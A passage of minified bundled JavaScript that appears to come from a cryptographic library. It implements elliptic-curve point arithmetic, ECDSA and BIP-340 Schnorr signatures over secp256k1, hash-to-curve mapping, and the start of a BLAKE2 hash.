                        if (!f(e)) throw new Error("Expected valid bigint: 0 < bigint < curve.n");
                    }
                    function m(e) {
                        const { allowedPrivateKeyLengths: r, nByteLength: s, wrapPrivateKey: a, n: u } = t;
                        if (r && "bigint" != typeof e) {
                            if (e instanceof Uint8Array && (e = i.bytesToHex(e)), "string" != typeof e || !r.includes(e.length)) throw new Error("Invalid key");
                            e = e.padStart(2 * s, "0");
                        }
                        let c;
                        try {
                            c = "bigint" == typeof e ? e : i.bytesToNumberBE((0, o.ensureBytes)("private key", e, s));
                        } catch (t) {
                            throw new Error(`private key must be ${s} bytes, hex or bigint, not ${typeof e}`);
                        }
                        return a && (c = n.mod(c, u)), p(c), c;
                    }
                    const g = new Map;
                    function y(e) {
                        if (!(e instanceof v)) throw new Error("ProjectivePoint expected");
                    }
                    class v {
                        constructor(e, t, n){
                            if (this.px = e, this.py = t, this.pz = n, null == e || !r.isValid(e)) throw new Error("x required");
                            if (null == t || !r.isValid(t)) throw new Error("y required");
                            if (null == n || !r.isValid(n)) throw new Error("z required");
                        }
                        static fromAffine(e) {
                            const { x: t, y: n } = e || {};
                            if (!e || !r.isValid(t) || !r.isValid(n)) throw new Error("invalid affine point");
                            if (e instanceof v) throw new Error("projective point not allowed");
                            const i = (e)=>r.eql(e, r.ZERO);
                            return i(t) && i(n) ? v.ZERO : new v(t, n, r.ONE);
                        }
                        get x() {
                            return this.toAffine().x;
                        }
                        get y() {
                            return this.toAffine().y;
                        }
                        static normalizeZ(e) {
                            const t = r.invertBatch(e.map((e)=>e.pz));
                            return e.map((e, r)=>e.toAffine(t[r])).map(v.fromAffine);
                        }
                        static fromHex(e) {
                            const t = v.fromAffine(u((0, o.ensureBytes)("pointHex", e)));
                            return t.assertValidity(), t;
                        }
                        static fromPrivateKey(e) {
                            return v.BASE.multiply(m(e));
                        }
                        _setWindowSize(e) {
                            this._WINDOW_SIZE = e, g.delete(this);
                        }
                        assertValidity() {
                            if (this.is0()) {
                                if (t.allowInfinityPoint) return;
                                throw new Error("bad point: ZERO");
                            }
                            const { x: e, y: n } = this.toAffine();
                            if (!r.isValid(e) || !r.isValid(n)) throw new Error("bad point: x or y not FE");
                            const i = r.sqr(n), o = d(e);
                            if (!r.eql(i, o)) throw new Error("bad point: equation left != right");
                            if (!this.isTorsionFree()) throw new Error("bad point: not in prime-order subgroup");
                        }
                        hasEvenY() {
                            const { y: e } = this.toAffine();
                            if (r.isOdd) return !r.isOdd(e);
                            throw new Error("Field doesn't support isOdd");
                        }
                        equals(e) {
                            y(e);
                            const { px: t, py: n, pz: i } = this, { px: o, py: s, pz: a } = e, u = r.eql(r.mul(t, a), r.mul(o, i)), c = r.eql(r.mul(n, a), r.mul(s, i));
                            return u && c;
                        }
                        negate() {
                            return new v(this.px, r.neg(this.py), this.pz);
                        }
                        double() {
                            const { a: e, b: n } = t, i = r.mul(n, h), { px: o, py: s, pz: a } = this;
                            let u = r.ZERO, c = r.ZERO, l = r.ZERO, d = r.mul(o, o), f = r.mul(s, s), p = r.mul(a, a), m = r.mul(o, s);
                            return m = r.add(m, m), l = r.mul(o, a), l = r.add(l, l), u = r.mul(e, l), c = r.mul(i, p), c = r.add(u, c), u = r.sub(f, c), c = r.add(f, c), c = r.mul(u, c), u = r.mul(m, u), l = r.mul(i, l), p = r.mul(e, p), m = r.sub(d, p), m = r.mul(e, m), m = r.add(m, l), l = r.add(d, d), d = r.add(l, d), d = r.add(d, p), d = r.mul(d, m), c = r.add(c, d), p = r.mul(s, a), p = r.add(p, p), d = r.mul(p, m), u = r.sub(u, d), l = r.mul(p, f), l = r.add(l, l), l = r.add(l, l), new v(u, c, l);
                        }
                        add(e) {
                            y(e);
                            const { px: n, py: i, pz: o } = this, { px: s, py: a, pz: u } = e;
                            let c = r.ZERO, l = r.ZERO, d = r.ZERO;
                            const f = t.a, p = r.mul(t.b, h);
                            let m = r.mul(n, s), g = r.mul(i, a), b = r.mul(o, u), E = r.add(n, i), A = r.add(s, a);
                            E = r.mul(E, A), A = r.add(m, g), E = r.sub(E, A), A = r.add(n, o);
                            let _ = r.add(s, u);
                            return A = r.mul(A, _), _ = r.add(m, b), A = r.sub(A, _), _ = r.add(i, o), c = r.add(a, u), _ = r.mul(_, c), c = r.add(g, b), _ = r.sub(_, c), d = r.mul(f, A), c = r.mul(p, b), d = r.add(c, d), c = r.sub(g, d), d = r.add(g, d), l = r.mul(c, d), g = r.add(m, m), g = r.add(g, m), b = r.mul(f, b), A = r.mul(p, A), g = r.add(g, b), b = r.sub(m, b), b = r.mul(f, b), A = r.add(A, b), m = r.mul(g, A), l = r.add(l, m), m = r.mul(_, A), c = r.mul(E, c), c = r.sub(c, m), m = r.mul(E, g), d = r.mul(_, d), d = r.add(d, m), new v(c, l, d);
                        }
                        subtract(e) {
                            return this.add(e.negate());
                        }
                        is0() {
                            return this.equals(v.ZERO);
                        }
                        wNAF(e) {
                            return E.wNAFCached(this, g, e, (e)=>{
                                const t = r.invertBatch(e.map((e)=>e.pz));
                                return e.map((e, r)=>e.toAffine(t[r])).map(v.fromAffine);
                            });
                        }
                        multiplyUnsafe(e) {
                            const n = v.ZERO;
                            if (e === c) return n;
                            if (p(e), e === l) return this;
                            const { endo: i } = t;
                            if (!i) return E.unsafeLadder(this, e);
                            let { k1neg: o, k1: s, k2neg: a, k2: u } = i.splitScalar(e), d = n, h = n, f = this;
                            for(; s > c || u > c;)s & l && (d = d.add(f)), u & l && (h = h.add(f)), f = f.double(), s >>= l, u >>= l;
                            return o && (d = d.negate()), a && (h = h.negate()), h = new v(r.mul(h.px, i.beta), h.py, h.pz), d.add(h);
                        }
                        multiply(e) {
                            p(e);
                            let n, i, o = e;
                            const { endo: s } = t;
                            if (s) {
                                const { k1neg: e, k1: t, k2neg: a, k2: u } = s.splitScalar(o);
                                let { p: c, f: l } = this.wNAF(t), { p: d, f: h } = this.wNAF(u);
                                c = E.constTimeNegate(e, c), d = E.constTimeNegate(a, d), d = new v(r.mul(d.px, s.beta), d.py, d.pz), n = c.add(d), i = l.add(h);
                            } else {
                                const { p: e, f: t } = this.wNAF(o);
                                n = e, i = t;
                            }
                            return v.normalizeZ([
                                n,
                                i
                            ])[0];
                        }
                        multiplyAndAddUnsafe(e, t, r) {
                            const n = v.BASE, i = (e, t)=>t !== c && t !== l && e.equals(n) ? e.multiply(t) : e.multiplyUnsafe(t), o = i(this, t).add(i(e, r));
                            return o.is0() ? void 0 : o;
                        }
                        toAffine(e) {
                            const { px: t, py: n, pz: i } = this, o = this.is0();
                            null == e && (e = o ? r.ONE : r.inv(i));
                            const s = r.mul(t, e), a = r.mul(n, e), u = r.mul(i, e);
                            if (o) return {
                                x: r.ZERO,
                                y: r.ZERO
                            };
                            if (!r.eql(u, r.ONE)) throw new Error("invZ was invalid");
                            return {
                                x: s,
                                y: a
                            };
                        }
                        isTorsionFree() {
                            const { h: e, isTorsionFree: r } = t;
                            if (e === l) return !0;
                            if (r) return r(v, this);
                            throw new Error("isTorsionFree() has not been declared for the elliptic curve");
                        }
                        clearCofactor() {
                            const { h: e, clearCofactor: r } = t;
                            return e === l ? this : r ? r(v, this) : this.multiplyUnsafe(t.h);
                        }
                        toRawBytes(e = !0) {
                            return this.assertValidity(), a(v, this, e);
                        }
                        toHex(e = !0) {
                            return i.bytesToHex(this.toRawBytes(e));
                        }
                    }
                    v.BASE = new v(t.Gx, t.Gy, r.ONE), v.ZERO = new v(r.ZERO, r.ONE, r.ZERO);
                    const b = t.nBitLength, E = (0, s.wNAF)(v, t.endo ? Math.ceil(b / 2) : b);
                    return {
                        CURVE: t,
                        ProjectivePoint: v,
                        normPrivateKeyToScalar: m,
                        weierstrassEquation: d,
                        isWithinCurveOrder: f
                    };
                }
                function m(e, t) {
                    const r = e.ORDER;
                    let n = c;
                    for(let e = r - l; e % d === c; e /= d)n += l;
                    const i = n, o = (r - l) / d ** i, s = (o - l) / d, a = d ** i - l, u = d ** (i - l), p = e.pow(t, o), m = e.pow(t, (o + l) / d);
                    let g = (t, r)=>{
                        let n = p, o = e.pow(r, a), c = e.sqr(o);
                        c = e.mul(c, r);
                        let h = e.mul(t, c);
                        h = e.pow(h, s), h = e.mul(h, o), o = e.mul(h, r), c = e.mul(h, t);
                        let f = e.mul(c, o);
                        h = e.pow(f, u);
                        let g = e.eql(h, e.ONE);
                        o = e.mul(c, m), h = e.mul(f, n), c = e.cmov(o, c, g), f = e.cmov(h, f, g);
                        for(let t = i; t > l; t--){
                            let r = d ** (t - d), i = e.pow(f, r);
                            const s = e.eql(i, e.ONE);
                            o = e.mul(c, n), n = e.mul(n, n), i = e.mul(f, n), c = e.cmov(o, c, s), f = e.cmov(i, f, s);
                        }
                        return {
                            isValid: g,
                            value: c
                        };
                    };
                    if (e.ORDER % f === h) {
                        const r = (e.ORDER - h) / f, n = e.sqrt(e.neg(t));
                        g = (t, i)=>{
                            let o = e.sqr(i);
                            const s = e.mul(t, i);
                            o = e.mul(o, s);
                            let a = e.pow(o, r);
                            a = e.mul(a, s);
                            const u = e.mul(a, n), c = e.mul(e.sqr(a), i), l = e.eql(c, t);
                            return {
                                isValid: l,
                                value: e.cmov(u, a, l)
                            };
                        };
                    }
                    return g;
                }
                t.weierstrassPoints = p, t.weierstrass = function(e) {
                    const r = function(e) {
                        const t = (0, s.validateBasic)(e);
                        return i.validateObject(t, {
                            hash: "hash",
                            hmac: "function",
                            randomBytes: "function"
                        }, {
                            bits2int: "function",
                            bits2int_modN: "function",
                            lowS: "boolean"
                        }), Object.freeze({
                            lowS: !0,
                            ...t
                        });
                    }(e), { Fp: a, n: u } = r, d = a.BYTES + 1, h = 2 * a.BYTES + 1;
                    function f(e) {
                        return n.mod(e, u);
                    }
                    function m(e) {
                        return n.invert(e, u);
                    }
                    const { ProjectivePoint: g, normPrivateKeyToScalar: y, weierstrassEquation: v, isWithinCurveOrder: b } = p({
                        ...r,
                        toBytes (e, t, r) {
                            const n = t.toAffine(), o = a.toBytes(n.x), s = i.concatBytes;
                            return r ? s(Uint8Array.from([
                                t.hasEvenY() ? 2 : 3
                            ]), o) : s(Uint8Array.from([
                                4
                            ]), o, a.toBytes(n.y));
                        },
                        fromBytes (e) {
                            const t = e.length, r = e[0], n = e.subarray(1);
                            if (t !== d || 2 !== r && 3 !== r) {
                                if (t === h && 4 === r) return {
                                    x: a.fromBytes(n.subarray(0, a.BYTES)),
                                    y: a.fromBytes(n.subarray(a.BYTES, 2 * a.BYTES))
                                };
                                throw new Error(`Point of length ${t} was invalid. Expected ${d} compressed bytes or ${h} uncompressed bytes`);
                            }
                            {
                                const e = i.bytesToNumberBE(n);
                                if (!(c < (o = e) && o < a.ORDER)) throw new Error("Point is not on curve");
                                const t = v(e);
                                let s = a.sqrt(t);
                                return 1 == (1 & r) != ((s & l) === l) && (s = a.neg(s)), {
                                    x: e,
                                    y: s
                                };
                            }
                            var o;
                        }
                    }), E = (e)=>i.bytesToHex(i.numberToBytesBE(e, r.nByteLength));
                    function A(e) {
                        return e > u >> l;
                    }
                    const _ = (e, t, r)=>i.bytesToNumberBE(e.slice(t, r));
                    class w {
                        constructor(e, t, r){
                            this.r = e, this.s = t, this.recovery = r, this.assertValidity();
                        }
                        static fromCompact(e) {
                            const t = r.nByteLength;
                            return e = (0, o.ensureBytes)("compactSignature", e, 2 * t), new w(_(e, 0, t), _(e, t, 2 * t));
                        }
                        static fromDER(e) {
                            const { r: r, s: n } = t.DER.toSig((0, o.ensureBytes)("DER", e));
                            return new w(r, n);
                        }
                        assertValidity() {
                            if (!b(this.r)) throw new Error("r must be 0 < r < CURVE.n");
                            if (!b(this.s)) throw new Error("s must be 0 < s < CURVE.n");
                        }
                        addRecoveryBit(e) {
                            return new w(this.r, this.s, e);
                        }
                        recoverPublicKey(e) {
                            const { r: t, s: n, recovery: i } = this, s = S((0, o.ensureBytes)("msgHash", e));
                            if (null == i || ![
                                0,
                                1,
                                2,
                                3
                            ].includes(i)) throw new Error("recovery id invalid");
                            const u = 2 === i || 3 === i ? t + r.n : t;
                            if (u >= a.ORDER) throw new Error("recovery id 2 or 3 invalid");
                            const c = 0 == (1 & i) ? "02" : "03", l = g.fromHex(c + E(u)), d = m(u), h = f(-s * d), p = f(n * d), y = g.BASE.multiplyAndAddUnsafe(l, h, p);
                            if (!y) throw new Error("point at infinify");
                            return y.assertValidity(), y;
                        }
                        hasHighS() {
                            return A(this.s);
                        }
                        normalizeS() {
                            return this.hasHighS() ? new w(this.r, f(-this.s), this.recovery) : this;
                        }
                        toDERRawBytes() {
                            return i.hexToBytes(this.toDERHex());
                        }
                        toDERHex() {
                            return t.DER.hexFromSig({
                                r: this.r,
                                s: this.s
                            });
                        }
                        toCompactRawBytes() {
                            return i.hexToBytes(this.toCompactHex());
                        }
                        toCompactHex() {
                            return E(this.r) + E(this.s);
                        }
                    }
                    const T = {
                        isValidPrivateKey (e) {
                            try {
                                return y(e), !0;
                            } catch (e) {
                                return !1;
                            }
                        },
                        normPrivateKeyToScalar: y,
                        randomPrivateKey: ()=>{
                            const e = r.randomBytes(a.BYTES + 8), t = n.hashToPrivateScalar(e, u);
                            return i.numberToBytesBE(t, r.nByteLength);
                        },
                        precompute: (e = 8, t = g.BASE)=>(t._setWindowSize(e), t.multiply(BigInt(3)), t)
                    };
                    function R(e) {
                        const t = e instanceof Uint8Array, r = "string" == typeof e, n = (t || r) && e.length;
                        return t ? n === d || n === h : r ? n === 2 * d || n === 2 * h : e instanceof g;
                    }
                    const I = r.bits2int || function(e) {
                        const t = i.bytesToNumberBE(e), n = 8 * e.length - r.nBitLength;
                        return n > 0 ? t >> BigInt(n) : t;
                    }, S = r.bits2int_modN || function(e) {
                        return f(I(e));
                    }, P = i.bitMask(r.nBitLength);
                    function O(e) {
                        if ("bigint" != typeof e) throw new Error("bigint expected");
                        if (!(c <= e && e < P)) throw new Error(`bigint expected < 2^${r.nBitLength}`);
                        return i.numberToBytesBE(e, r.nByteLength);
                    }
                    const x = {
                        lowS: r.lowS,
                        prehash: !1
                    }, M = {
                        lowS: r.lowS,
                        prehash: !1
                    };
                    return g.BASE._setWindowSize(8), {
                        CURVE: r,
                        getPublicKey: function(e, t = !0) {
                            return g.fromPrivateKey(e).toRawBytes(t);
                        },
                        getSharedSecret: function(e, t, r = !0) {
                            if (R(e)) throw new Error("first arg must be private key");
                            if (!R(t)) throw new Error("second arg must be public key");
                            return g.fromHex(t).multiply(y(e)).toRawBytes(r);
                        },
                        sign: function(e, t, n = x) {
                            const { seed: s, k2sig: u } = function(e, t, n = x) {
                                if ([
                                    "recovered",
                                    "canonical"
                                ].some((e)=>e in n)) throw new Error("sign() legacy options not supported");
                                const { hash: s, randomBytes: u } = r;
                                let { lowS: d, prehash: h, extraEntropy: p } = n;
                                null == d && (d = !0), e = (0, o.ensureBytes)("msgHash", e), h && (e = (0, o.ensureBytes)("prehashed msgHash", s(e)));
                                const v = S(e), E = y(t), _ = [
                                    O(E),
                                    O(v)
                                ];
                                if (null != p) {
                                    const e = !0 === p ? u(a.BYTES) : p;
                                    _.push((0, o.ensureBytes)("extraEntropy", e, a.BYTES));
                                }
                                const T = i.concatBytes(..._), R = v;
                                return {
                                    seed: T,
                                    k2sig: function(e) {
                                        const t = I(e);
                                        if (!b(t)) return;
                                        const r = m(t), n = g.BASE.multiply(t).toAffine(), i = f(n.x);
                                        if (i === c) return;
                                        const o = f(r * f(R + i * E));
                                        if (o === c) return;
                                        let s = (n.x === i ? 0 : 2) | Number(n.y & l), a = o;
                                        return d && A(o) && (a = function(e) {
                                            return A(e) ? f(-e) : e;
                                        }(o), s ^= 1), new w(i, a, s);
                                    }
                                };
                            }(e, t, n);
                            return i.createHmacDrbg(r.hash.outputLen, r.nByteLength, r.hmac)(s, u);
                        },
                        verify: function(e, n, i, s = M) {
                            const a = e;
                            if (n = (0, o.ensureBytes)("msgHash", n), i = (0, o.ensureBytes)("publicKey", i), "strict" in s) throw new Error("options.strict was renamed to lowS");
                            const { lowS: u, prehash: c } = s;
                            let l, d;
                            try {
                                if ("string" == typeof a || a instanceof Uint8Array) try {
                                    l = w.fromDER(a);
                                } catch (e) {
                                    if (!(e instanceof t.DER.Err)) throw e;
                                    l = w.fromCompact(a);
                                }
                                else {
                                    if ("object" != typeof a || "bigint" != typeof a.r || "bigint" != typeof a.s) throw new Error("PARSE");
                                    {
                                        const { r: e, s: t } = a;
                                        l = new w(e, t);
                                    }
                                }
                                d = g.fromHex(i);
                            } catch (e) {
                                if ("PARSE" === e.message) throw new Error("signature must be Signature instance, Uint8Array or hex string");
                                return !1;
                            }
                            if (u && l.hasHighS()) return !1;
                            c && (n = r.hash(n));
                            const { r: h, s: p } = l, y = S(n), v = m(p), b = f(y * v), E = f(h * v), A = g.BASE.multiplyAndAddUnsafe(d, b, E)?.toAffine();
                            return !!A && f(A.x) === h;
                        },
                        ProjectivePoint: g,
                        Signature: w,
                        utils: T
                    };
                }, t.SWUFpSqrtRatio = m, t.mapToCurveSimpleSWU = function(e, t) {
                    if (n.validateField(e), !e.isValid(t.A) || !e.isValid(t.B) || !e.isValid(t.Z)) throw new Error("mapToCurveSimpleSWU: invalid opts");
                    const r = m(e, t.Z);
                    if (!e.isOdd) throw new Error("Fp.isOdd is not implemented!");
                    return (n)=>{
                        let i, o, s, a, u, c, l, d;
                        i = e.sqr(n), i = e.mul(i, t.Z), o = e.sqr(i), o = e.add(o, i), s = e.add(o, e.ONE), s = e.mul(s, t.B), a = e.cmov(t.Z, e.neg(o), !e.eql(o, e.ZERO)), a = e.mul(a, t.A), o = e.sqr(s), c = e.sqr(a), u = e.mul(c, t.A), o = e.add(o, u), o = e.mul(o, s), c = e.mul(c, a), u = e.mul(c, t.B), o = e.add(o, u), l = e.mul(i, s);
                        const { isValid: h, value: f } = r(o, c);
                        d = e.mul(i, n), d = e.mul(d, f), l = e.cmov(l, s, h), d = e.cmov(d, f, h);
                        const p = e.isOdd(n) === e.isOdd(d);
                        return d = e.cmov(e.neg(d), d, p), l = e.div(l, a), {
                            x: l,
                            y: d
                        };
                    };
                };
            },
            8358: (e, t, r)=>{
                "use strict";
                var n;
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.encodeToCurve = t.hashToCurve = t.schnorr = t.secp256k1 = void 0;
                const i = r(6053), o = r(64), s = r(9530), a = r(7851), u = r(4323), c = r(1322), l = r(5887), d = BigInt("0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffffc2f"), h = BigInt("0xfffffffffffffffffffffffffffffffebaaedce6af48a03bbfd25e8cd0364141"), f = BigInt(1), p = BigInt(2), m = (e, t)=>(e + t / p) / t;
                function g(e) {
                    const t = d, r = BigInt(3), n = BigInt(6), i = BigInt(11), o = BigInt(22), a = BigInt(23), u = BigInt(44), c = BigInt(88), l = e * e * e % t, h = l * l * e % t, f = (0, s.pow2)(h, r, t) * h % t, m = (0, s.pow2)(f, r, t) * h % t, g = (0, s.pow2)(m, p, t) * l % t, v = (0, s.pow2)(g, i, t) * g % t, b = (0, s.pow2)(v, o, t) * v % t, E = (0, s.pow2)(b, u, t) * b % t, A = (0, s.pow2)(E, c, t) * E % t, _ = (0, s.pow2)(A, u, t) * b % t, w = (0, s.pow2)(_, r, t) * h % t, T = (0, s.pow2)(w, a, t) * v % t, R = (0, s.pow2)(T, n, t) * l % t, I = (0, s.pow2)(R, p, t);
                    if (!y.eql(y.sqr(I), e)) throw new Error("Cannot find square root");
                    return I;
                }
                const y = (0, s.Field)(d, void 0, void 0, {
                    sqrt: g
                });
                t.secp256k1 = (0, l.createCurve)({
                    a: BigInt(0),
                    b: BigInt(7),
                    Fp: y,
                    n: h,
                    Gx: BigInt("55066263022277343669578718895168534326250603453777594175500187360389116729240"),
                    Gy: BigInt("32670510020758816978083085130507043184471273380659243275938904335757337482424"),
                    h: BigInt(1),
                    lowS: !0,
                    endo: {
                        beta: BigInt("0x7ae96a2b657c07106e64479eac3434e99cf0497512f58995c1396c28719501ee"),
                        splitScalar: (e)=>{
                            const t = h, r = BigInt("0x3086d221a7d46bcde86c90e49284eb15"), n = -f * BigInt("0xe4437ed6010e88286f547fa90abfe4c3"), i = BigInt("0x114ca50f7a8e2f3f657c1108d9d44cfd8"), o = r, a = BigInt("0x100000000000000000000000000000000"), u = m(o * e, t), c = m(-n * e, t);
                            let l = (0, s.mod)(e - u * r - c * i, t), d = (0, s.mod)(-u * n - c * o, t);
                            const p = l > a, g = d > a;
                            if (p && (l = t - l), g && (d = t - d), l > a || d > a) throw new Error("splitScalar: Endomorphism failed, k=" + e);
                            return {
                                k1neg: p,
                                k1: l,
                                k2neg: g,
                                k2: d
                            };
                        }
                    }
                }, i.sha256);
                const v = BigInt(0), b = (e)=>"bigint" == typeof e && v < e && e < d, E = {};
                function A(e, ...t) {
                    let r = E[e];
                    if (void 0 === r) {
                        const t = (0, i.sha256)(Uint8Array.from(e, (e)=>e.charCodeAt(0)));
                        r = (0, u.concatBytes)(t, t), E[e] = r;
                    }
                    return (0, i.sha256)((0, u.concatBytes)(r, ...t));
                }
                const _ = (e)=>e.toRawBytes(!0).slice(1), w = (e)=>(0, u.numberToBytesBE)(e, 32), T = (e)=>(0, s.mod)(e, d), R = (e)=>(0, s.mod)(e, h), I = t.secp256k1.ProjectivePoint;
                function S(e) {
                    let r = t.secp256k1.utils.normPrivateKeyToScalar(e), n = I.fromPrivateKey(r);
                    return {
                        scalar: n.hasEvenY() ? r : R(-r),
                        bytes: _(n)
                    };
                }
                function P(e) {
                    if (!b(e)) throw new Error("bad x: need 0 < x < p");
                    const t = T(e * e);
                    let r = g(T(t * e + BigInt(7)));
                    r % p !== v && (r = T(-r));
                    const n = new I(e, r, f);
                    return n.assertValidity(), n;
                }
                function O(...e) {
                    return R((0, u.bytesToNumberBE)(A("BIP0340/challenge", ...e)));
                }
                function x(e, t, r) {
                    const n = (0, u.ensureBytes)("signature", e, 64), i = (0, u.ensureBytes)("message", t), o = (0, u.ensureBytes)("publicKey", r, 32);
                    try {
                        const e = P((0, u.bytesToNumberBE)(o)), t = (0, u.bytesToNumberBE)(n.subarray(0, 32));
                        if (!b(t)) return !1;
                        const r = (0, u.bytesToNumberBE)(n.subarray(32, 64));
                        if (!("bigint" == typeof (l = r) && v < l && l < h)) return !1;
                        const d = O(w(t), _(e), i), f = (s = e, a = r, c = R(-d), I.BASE.multiplyAndAddUnsafe(s, a, c));
                        return !(!f || !f.hasEvenY() || f.toAffine().x !== t);
                    } catch (e) {
                        return !1;
                    }
                    var s, a, c, l;
                }
                t.schnorr = {
                    getPublicKey: function(e) {
                        return S(e).bytes;
                    },
                    sign: function(e, t, r = (0, o.randomBytes)(32)) {
                        const n = (0, u.ensureBytes)("message", e), { bytes: i, scalar: s } = S(t), a = (0, u.ensureBytes)("auxRand", r, 32), c = w(s ^ (0, u.bytesToNumberBE)(A("BIP0340/aux", a))), l = A("BIP0340/nonce", c, i, n), d = R((0, u.bytesToNumberBE)(l));
                        if (d === v) throw new Error("sign failed: k is zero");
                        const { bytes: h, scalar: f } = S(d), p = O(h, i, n), m = new Uint8Array(64);
                        if (m.set(h, 0), m.set(w(R(f + p * s)), 32), !x(m, n, i)) throw new Error("sign: Invalid signature produced");
                        return m;
                    },
                    verify: x,
                    utils: {
                        randomPrivateKey: t.secp256k1.utils.randomPrivateKey,
                        lift_x: P,
                        pointToBytes: _,
                        numberToBytesBE: u.numberToBytesBE,
                        bytesToNumberBE: u.bytesToNumberBE,
                        taggedHash: A,
                        mod: s.mod
                    }
                };
                const M = c.isogenyMap(y, [
                    [
                        "0x8e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38daaaaa8c7",
                        "0x7d3d4c80bc321d5b9f315cea7fd44c5d595d2fc0bf63b92dfff1044f17c6581",
                        "0x534c328d23f234e6e2a413deca25caece4506144037c40314ecbd0b53d9dd262",
                        "0x8e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38e38daaaaa88c"
                    ],
                    [
                        "0xd35771193d94918a9ca34ccbb7b640dd86cd409542f8487d9fe6b745781eb49b",
                        "0xedadc6f64383dc1df7c4b2d51b54225406d36b641f5e41bbc52a56612a8c6d14",
                        "0x0000000000000000000000000000000000000000000000000000000000000001"
                    ],
                    [
                        "0x4bda12f684bda12f684bda12f684bda12f684bda12f684bda12f684b8e38e23c",
                        "0xc75e0c32d5cb7c0fa9d0a54b12a0a6d5647ab046d686da6fdffc90fc201d71a3",
                        "0x29a6194691f91a73715209ef6512e576722830a201be2018a765e85a9ecee931",
                        "0x2f684bda12f684bda12f684bda12f684bda12f684bda12f684bda12f38e38d84"
                    ],
                    [
                        "0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffefffff93b",
                        "0x7a06534bb8bdb49fd5e9e6632722c2989467c1bfc8e8d978dfb425d2685c2573",
                        "0x6484aa716545ca2cf3a70c3fa8fe337e0a3d21162f0d6299a7bf8192bfd2a76f",
                        "0x0000000000000000000000000000000000000000000000000000000000000001"
                    ]
                ].map((e)=>e.map((e)=>BigInt(e)))), B = (0, a.mapToCurveSimpleSWU)(y, {
                    A: BigInt("0x3f8731abdd661adca08a5558f0f5d272e953d363cb6f0e5d405447c01a444533"),
                    B: BigInt("1771"),
                    Z: y.create(BigInt("-11"))
                });
                n = c.createHasher(t.secp256k1.ProjectivePoint, (e)=>{
                    const { x: t, y: r } = B(y.create(e[0]));
                    return M(t, r);
                }, {
                    DST: "secp256k1_XMD:SHA-256_SSWU_RO_",
                    encodeDST: "secp256k1_XMD:SHA-256_SSWU_NU_",
                    p: y.ORDER,
                    m: 1,
                    k: 128,
                    expand: "xmd",
                    hash: i.sha256
                }), t.hashToCurve = n.hashToCurve, t.encodeToCurve = n.encodeToCurve;
            },
            3525: (e, t)=>{
                "use strict";
                function r(e) {
                    if (!Number.isSafeInteger(e) || e < 0) throw new Error(`Wrong positive integer: ${e}`);
                }
                function n(e) {
                    if ("boolean" != typeof e) throw new Error(`Expected boolean, not ${e}`);
                }
                function i(e, ...t) {
                    if (!(e instanceof Uint8Array)) throw new TypeError("Expected Uint8Array");
                    if (t.length > 0 && !t.includes(e.length)) throw new TypeError(`Expected Uint8Array of length ${t}, not of length=${e.length}`);
                }
                function o(e) {
                    if ("function" != typeof e || "function" != typeof e.create) throw new Error("Hash should be wrapped by utils.wrapConstructor");
                    r(e.outputLen), r(e.blockLen);
                }
                function s(e, t = !0) {
                    if (e.destroyed) throw new Error("Hash instance has been destroyed");
                    if (t && e.finished) throw new Error("Hash#digest() has already been called");
                }
                function a(e, t) {
                    i(e);
                    const r = t.outputLen;
                    if (e.length < r) throw new Error(`digestInto() expects output buffer of length at least ${r}`);
                }
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.output = t.exists = t.hash = t.bytes = t.bool = t.number = void 0, t.number = r, t.bool = n, t.bytes = i, t.hash = o, t.exists = s, t.output = a;
                const u = {
                    number: r,
                    bool: n,
                    bytes: i,
                    hash: o,
                    exists: s,
                    output: a
                };
                t.default = u;
            },
            2686: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.BLAKE2 = t.SIGMA = void 0;
                const n = r(3525), i = r(64);
                t.SIGMA = new Uint8Array([
                    0,
                    1,
                    2,
                    3,
                    4,
                    5,
                    6,
                    7,
                    8,
                    9,
                    10,
                    11,
                    12,
                    13,
                    14,
                    15,
                    14,
                    10,
                    4,
                    8,
                    9,
                    15,
                    13,
                    6,
                    1,
                    12,
                    0,
                    2,
                    11,
                    7,
                    5,
                    3,
                    11,
                    8,
                    12,
                    0,
                    5,
                    2,
                    15,
                    13,
                    10,
                    14,
                    3,
                    6,
                    7,
                    1,
                    9,
                    4,
                    7,
                    9,
                    3,
                    1,
                    13,
                    12,
                    11,
                    14,
                    2,
                    6,
                    5,
                    10,
                    4,
                    0,
                    15,
                    8,
                    9,
                    0,
                    5,
                    7,
                    2,
                    4,
                    10,
                    15,
                    14,
                    1,
                    11,
                    12,
                    6,
                    8,
                    3,
                    13,
                    2,
                    12,
                    6,
                    10,
                    0,
                    11,
                    8,
                    3,
                    4,
                    13,
                    7,
                    5,
                    15,
                    14,
                    1,
                    9,
                    12,
                    5,
                    1,
                    15,
                    14,
                    13,
                    4,
                    10,
                    0,
                    7,
                    6,
                    3,
                    9,
                    2,
                    8,
                    11,
                    13,
                    11,
                    7,
                    14,
                    12,
                    1,
                    3,
                    9,
                    5,
                    0,
                    15,
                    4,
                    8,
                    6,
                    2,
                    10,
                    6,
                    15,
                    14,
                    9,
                    11,
                    3,
                    0,
                    8,
                    12,
                    2,
                    13,
                    7,
                    1,
                    4,
                    10,
                    5,
                    10,
                    2,
                    8,
                    4,
                    7,
                    6,
                    1,
                    5,
                    15,
                    11,
                    9,
                    14,
                    3,
                    12,
                    13,
                    0,
                    0,
                    1,
                    2,
                    3,
                    4,
                    5,
                    6,
                    7,
                    8,
                    9,
                    10,
                    11,
                    12,
                    13,
                    14,
                    15,
                    14,
                    10,
                    4,
                    8,
                    9,
                    15,
                    13,
                    6,
                    1,
                    12,
                    0,
                    2,
                    11,
                    7,
                    5,
                    3
                ]);
                class o extends i.Hash {
                    constructor(e, t, r = {}, o, s, a){
                        if (super(), this.blockLen = e, this.outputLen = t, this.length = 0, this.pos = 0, this.finished = !1, this.destroyed = !1, n.default.number(e), n.default.number(t), n.default.number(o), t < 0 || t > o) throw new Error("outputLen bigger than keyLen");
                        if (void 0 !== r.key && (r.key.length < 1 || r.key.length > o)) throw new Error(`key must be up 1..${o} byte long or undefined`);
                        if (void 0 !== r.salt && r.salt.length !== s) throw new Error(`salt must be ${s} byte long or undefined`);
                        if (void 0 !== r.personalization && r.personalization.length !== a) throw new Error(`personalization must be ${a} byte long or undefined`);
